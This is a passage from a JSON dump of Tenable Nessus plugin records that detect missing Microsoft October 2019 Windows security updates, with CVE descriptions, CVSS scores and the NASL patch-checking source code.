or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520011');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520011])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:19:59", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520004.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. 
An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the user's system. (CVE-2019-1060)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the user's\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. 
An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. 
An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service improperly handles a\n Registry Restore Key function. An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. 
(CVE-2019-1319)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4520004.NASL", "href": "https://www.tenable.com/plugins/nessus/129721", "published": "2019-10-08T00:00:00", "title": "KB4520004: Windows 10 Version 1709 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129721);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/15\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1060\",\n \"CVE-2019-1166\",\n \"CVE-2019-1230\",\n \"CVE-2019-1238\",\n \"CVE-2019-1311\",\n \"CVE-2019-1315\",\n \"CVE-2019-1316\",\n \"CVE-2019-1317\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1320\",\n \"CVE-2019-1321\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1334\",\n \"CVE-2019-1339\",\n \"CVE-2019-1340\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1343\",\n \"CVE-2019-1344\",\n \"CVE-2019-1345\",\n \"CVE-2019-1346\",\n \"CVE-2019-1347\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4520004\");\n script_xref(name:\"MSFT\", value:\"MS19-4520004\");\n\n script_name(english:\"KB4520004: Windows 10 Version 1709 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520004.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in\n Windows AppX Deployment Server that allows file creation\n in arbitrary 
locations. (CVE-2019-1340)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n does not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - A denial of service vulnerability exists when Windows\n improperly handles hard links. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1317)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1343,\n CVE-2019-1346, CVE-2019-1347)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1238)\n\n - An information disclosure vulnerability exists when the\n Windows Hyper-V Network Switch on a host operating\n system fails to properly validate input from an\n authenticated user on a guest operating system.\n (CVE-2019-1230)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows Setup when it does not properly handle\n privileges. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could then install programs; view,\n change or delete data. (CVE-2019-1316)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles authentication requests. An\n attacker who successfully exploited this vulnerability\n could run processes in an elevated context. An attacker\n could exploit this vulnerability by running a specially\n crafted application on the victim system. The update\n addresses the vulnerability by correcting the way\n Windows handles authentication requests. (CVE-2019-1320)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. 
(CVE-2019-1060)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1334, CVE-2019-1345)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. 
The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An elevation of privilege vulnerability exists when\n Windows CloudStore improperly handles file Discretionary\n Access Control List (DACL). An attacker who successfully\n exploited this vulnerability could overwrite a targeted\n file leading to an elevated status. (CVE-2019-1321)\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - A remote code execution vulnerability exists when the\n Windows Imaging API improperly handles objects in\n memory. The vulnerability could corrupt memory in a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. (CVE-2019-1311)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service, improperly handles a\n Registry Restore Key function. 
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\");\n # https://support.microsoft.com/en-us/help/4520004/windows-10-update-kb4520004\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?60d0b932\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4520004.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1359\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-10\";\nkbs = make_list('4520004');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"16299\",\n rollup_date:\"10_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4520004])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-14T09:20:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4520003\nor cumulative update 4519976. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. 
An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. 
The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non-Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2019-1363)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. 
(CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the user's system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. (CVE-2019-1315, CVE-2019-1339)\n\n - An elevation of privilege vulnerability exists when\n Microsoft IIS Server fails to check the length of a\n buffer prior to copying memory to it. 
An attacker who\n successfully exploited this vulnerability can allow an\n unprivileged function run by the user to execute code in\n the context of NT AUTHORITY\\system escaping the Sandbox.\n The security update addresses the vulnerability by\n correcting how Microsoft IIS Server sanitizes web\n requests. (CVE-2019-1365)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n improperly handle browser cookies. An attacker who\n successfully exploited this vulnerability could trick a\n browser into overwriting a secure cookie with an\n insecure cookie. The insecure cookie could serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2019-1357)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2019-1361)\n\n - A spoofing vulnerability exists when Microsoft Browsers\n do not properly parse HTTP content. An attacker who\n successfully exploited this vulnerability could\n impersonate a user request by crafting HTTP queries. The\n specially crafted website could either spoof content or\n serve as a pivot to chain an attack with other\n vulnerabilities in web services. (CVE-2019-0608)\n\n - An elevation of privilege vulnerability exists when\n umpo.dll of the Power Service improperly handles a\n Registry Restore Key function. 
An attacker who\n successfully exploited this vulnerability could delete a\n targeted registry key leading to an elevated status.\n (CVE-2019-1341)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS19_OCT_4519976.NASL", "href": "https://www.tenable.com/plugins/nessus/129718", "published": "2019-10-08T00:00:00", "title": "KB4520003: Windows 7 and Windows Server 2008 R2 October 2019 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(129718);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/12/13\");\n\n script_cve_id(\n \"CVE-2019-0608\",\n \"CVE-2019-1166\",\n \"CVE-2019-1238\",\n \"CVE-2019-1315\",\n \"CVE-2019-1318\",\n \"CVE-2019-1319\",\n \"CVE-2019-1325\",\n \"CVE-2019-1326\",\n \"CVE-2019-1333\",\n \"CVE-2019-1338\",\n \"CVE-2019-1339\",\n \"CVE-2019-1341\",\n \"CVE-2019-1342\",\n \"CVE-2019-1344\",\n \"CVE-2019-1346\",\n \"CVE-2019-1357\",\n \"CVE-2019-1358\",\n \"CVE-2019-1359\",\n \"CVE-2019-1361\",\n \"CVE-2019-1362\",\n \"CVE-2019-1363\",\n \"CVE-2019-1364\",\n \"CVE-2019-1365\",\n \"CVE-2019-1371\"\n );\n script_xref(name:\"MSKB\", value:\"4519976\");\n script_xref(name:\"MSKB\", value:\"4520003\");\n script_xref(name:\"MSFT\", value:\"MS19-4519976\");\n script_xref(name:\"MSFT\", value:\"MS19-4520003\");\n\n script_name(english:\"KB4520003: Windows 7 and Windows Server 2008 R2 October 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4520003\nor cumulative update 4519976. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when the\n Windows Jet Database Engine improperly handles objects\n in memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code on a victim\n system. An attacker could exploit this vulnerability by\n enticing a victim to open a specially crafted file. The\n update addresses the vulnerability by correcting the way\n the Windows Jet Database Engine handles objects in\n memory. (CVE-2019-1358, CVE-2019-1359)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2019-1371)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1333)\n\n - A security feature bypass vulnerability exists in\n Microsoft Windows when a man-in-the-middle attacker is\n able to successfully bypass the NTLMv2 protection if a\n client is also sending LMv2 responses. An attacker who\n successfully exploited this vulnerability could gain the\n ability to downgrade NTLM security features.\n (CVE-2019-1338)\n\n - A tampering vulnerability exists in Microsoft Windows\n when a man-in-the-middle attacker is able to\n successfully bypass the NTLM MIC (Message Integrity\n Check) protection. 
An attacker who successfully\n exploited this vulnerability could gain the ability to\n downgrade NTLM security features. (CVE-2019-1166)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2019-1319)\n\n - A spoofing vulnerability exists when Transport Layer\n Security (TLS) accesses non- Extended Master Secret\n (EMS) sessions. An attacker who successfully exploited\n this vulnerability may gain access to unauthorized\n information. (CVE-2019-1318)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2019-1346)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2019-1238)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. 
(CVE-2019-1363)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1326)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2019-1362, CVE-2019-1364)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles a\n process crash. An attacker who successfully exploited\n this vulnerability could delete a targeted file leading\n to an elevated status. (CVE-2019-1342)\n\n - An elevation of privilege vulnerability exists in the\n Windows redirected drive buffering system (rdbss.sys)\n when the operating system improperly handles specific\n local calls within Windows 7 for 32-bit systems. When\n this vulnerability is exploited within other versions of\n Windows it can cause a denial of service, but not an\n elevation of privilege. (CVE-2019-1325)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Code Integrity Module handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. (CVE-2019-1344)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting manager improperly handles hard\n links. An attacker who successfully exploited this\n vulnerability could overwrite a targeted file leading to\n an elevated status. 
